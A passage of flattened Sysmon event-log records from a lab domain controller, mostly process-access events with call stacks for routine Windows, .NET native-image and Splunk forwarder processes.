LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.271{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B004-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.271{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B004-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.209{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-AF04-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.193{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-AF04-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:45.193{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-AF04-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:45.131{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\5e4-0\WindowsFormsIntegration.dll2021-01-18 13:51:45.131 10341000x80000000000000008985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.146{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9272-6005-B604-00000000A301}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.146{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9272-6005-B604-00000000A301}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000008973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.115{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.115{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:46.115{59A5CD1D-90A0-6005-2901-00000000A301}44401132C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(0000000000FC404B)|UNKNOWN(0000000000FC3CFC)|UNKNOWN(0000000000FC4CBE)|UNKNOWN(0000000000FC2444)|UNKNOWN(0000000000FC0B66)|UNKNOWN(0000000000FC054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64) 10341000x80000000000000008970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4188C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{00000000-0000-0000-0000-000000000000}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-9272-6005-B504-00000000A301}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 